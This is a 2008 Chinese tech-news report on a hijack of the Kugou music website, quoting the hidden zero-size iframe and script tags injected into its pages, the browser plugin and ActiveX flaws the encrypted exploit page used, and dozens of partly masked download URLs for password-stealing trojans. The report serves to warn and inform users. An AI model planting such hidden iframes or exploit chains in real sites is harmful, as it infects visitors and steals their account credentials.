酷狗网遭遇黑客入侵　用户小心病毒暗流

发布时间：2008.04.17 11:15 来源：赛迪网作者：木淼鑫

【赛迪网-IT技术报道】4月16日，安天实验室发现，酷狗网(http://www.kugoo.com/home/)被黑客植入病毒，用户如果访问该网站，系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息。甚至导致死机。

该网站问题代码：

src="http://ring.ku***.com/cairing/BuildJs/HomePH.aspx"
http://ring.ku***.com/cairing/BuildJs/HomePH.aspx

问题框架代码：

<iframe src=http://s12.bm***.com/tmp.htm width=0 height=0>
</iframe> 
http://s12.bm***.com/tmp.htm

问题框架代码：

<script language="javascript" src="count.js"></script> 
http://s12.bm***.com/count.js

问题框架代码：

<iframe src=test.htm width=0 height=0></iframe> 
http://s12.bm***.com/test.htm

问题框架代码：

<iframe src=http://xxx3.uu****.net/q66.html width=100 height=0>
　　</iframe>
　　http://xxx3.uu***.net/q66.html

问题框架代码：

http://xxx3.uu****.net/news1.html

网马代码：

该加密网马解密后可知利用以下漏洞来传播：

MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
暴风影音播放器MPS.StormPlayer漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
迅雷漏洞
百度搜霸漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

当用户运行酷狗2007或访问酷狗网(http://www.kugoo.com/home/)时，系统会自动下载以下病毒文件：

　　http://aa1.us***.com/down/1.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)

　　http://aa1.us***.com/down/2.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)

　　http://aa1.us***.com/down/3.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafp)

　　http://aa1.us***.com/down/4.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaf)

　　http://aa1.us***.com/down/5.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zjk)

　　http://aa1.us***.com/down/6.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.anv)

　　http://aa1.us***.com/down/7.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.anv)

　　http://aa1.us***.com/down/8.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aadu)

　　http://aa1.us***.com/down/9.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zso)

　　http://aa1.us***.com/down/10.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/11.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aadz)

　　http://aa2.us***.com/down/12.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafo)

　　http://aa2.us***.com/down/13.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)

　　http://aa2.us***.com/down/14.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)

　　http://aa2.us***.com/down/15.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaed)

　　http://aa2.us***.com/down/16.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/17.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaig)

　　http://aa2.us***.com/down/18.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/19.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaog)

　　http://aa2.us***.com/down/20.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)

　　http://aa3.us***.com/down/21.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)

　　http://aa3.us***.com/down/22.exe 
　　病毒名：(Trojan-Downloader.Win32.Tiny.anv)

　　http://aa3.us***.com/down/23.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafa)

　　http://aa3.us***.com/down/24.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)

　　http://aa3.us***.com/down/25.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)

　　http://aa3.us***.com/down/26.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aaes)

　　http://aa3.us***.com/down/27.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.xmp)

　　http://aa3.us***.com/down/28.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aasp)

　　http://aa3.us***.com/down/29.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.zvr)

　　http://aa3.us***.com/down/30.exe 
　　病毒名：(Trojan-Downloader.Win32.Tiny.anv)

　　http://aa3.us***.com/down/31.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.yip)

　　http://aa3.us***.com/down/32.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafg)

　　http://aa3.us***.com/down/33.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafq)

　　http://aa3.us***.com/down/34.exe 
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aafq)

以上病毒文件为下载者木马和游戏盗号木马，自动运行后将会，盗取用户敏感信息，甚至导致死机。由于下载数量太多，这里不一一分析。

(责任编辑：李磊)

我要参与讨论

【相关文章】

网易遭遇黑客入侵　被篡改网页尚未修复

[ 发表评论 ] 字体[ 大、中、小 ] [ 打印 ] [ 进入博客 ] [ 进入论坛 ] [ 推荐给朋友 ]

【相关文章】

·	黑客利用木马程序偷业务资料敲诈被判4年	(04-17)	·	黑客新招:用CPU漏洞控制PC 方式隐蔽难检测	(04-17)
·	黑客攻击方式"变身" 可利用CPU漏洞控制PC	(04-17)	·	病毒囚禁输入法使其不能顺利切换	(04-16)
·	难缠的auto病毒	(04-16)	·	病毒破坏导致不能切换输入法的解决办法	(04-16)
·	"木马下载器"现新变种可远程盗取机密信息	(04-16)	·	反CNN网站遭黑客攻击网民无法登陆页面	(04-16)
·	病毒破坏导致不能切换输入法的解决办法	(04-16)	·	4月16日病毒播报:"U盘寄生虫"与"玛格尼亚"	(04-16)

【客户需求反馈表】

姓　　名:

更多资料　了解方案　认识厂商

单位名称:

联系电话:

电子邮件:

赛迪推荐

·	有奖:安全奥运大型社区活动 ezit社区奥运活动
·	策划:奥运巨星"邂逅"IT金主微软在华是否垄断?
·	奥运爆笑解说成风景网络词汇看奥运：有囧有槑
·	"飞思卡尔美洲技术论坛"下载活动获奖名单揭晓
·	VMware虚拟化技术保障业务连续数据库系统技巧

手机·资费

·新品·导购·评测·手机资费·宽带

手机搜索

诺基亚

N73

MOTO

[评测] 诺基亚全新N系手机魅影导航者6210s详评
[导购] 塞班S40系统手机推荐时尚粉色系女用手机
[新品] 索爱K770i四新色亮相摩托推出全藏文手机
[行情] 黑莓8820抢手价2000 多普达P800W售2250元
[手游] "无限江山" 打造武侠王朝 "星际风暴"测评

IT产品

·笔记本·台式机·服务器·打印·投影

IT产品搜索

虚拟化最新技术快来抢！奥运照片免费打印啦

芯强我就强联想ideapad Y530本开箱详细评测

娱乐电脑暑促大集合免费打印A4幅面照片活动

[热销] 联想T61 戴尔OptiPlex 索尼EX4 HP 520

[推荐] 英信NF130D 惠普G4 HPdx7400 佳能400D

[热评] iphone 索尼a100 爱普生R210 索尼T200

[降价] Sun Fire 280R 尼康D200 iPAQ hw6515

[新品] 惠普DL380 G5 三星Q1U 索尼VGN-UX37CN

IT技术

·开发·网管·安全·数据库·操作系统

·	焦点:2008年IBM Rational 软件开发高峰论坛
·	奥运安全从我做起探秘08奥运信息网络安全
·	带您详解网络数字电视的实现方法与关键技术
·	2008年下半年计算机病毒木马发展趋势预测
·	Oracle重建索引方法只能用sys和system登录
·	机器狗将导致虚拟化崩溃教你彻底玩转卡巴

信息化

·热点·专题·访谈·周刊·方案案例

·	网站建设市场重新洗牌一卡通引领革命潮流
·	北京加快信息化建设医保一卡通年底前启动
·	ERP案例分析 SaaS带来冲击 IT服务商面临挑战
·	通方期货CRM解决方案房地产行业CRM解决方案

IT博客

·曾剑秋·项立刚·Java学习·网管

IT技术论坛

·开发·网管·安全·数据库·系统

酷狗网遭遇黑客入侵 用户小心病毒暗流

酷狗网遭遇黑客入侵　用户小心病毒暗流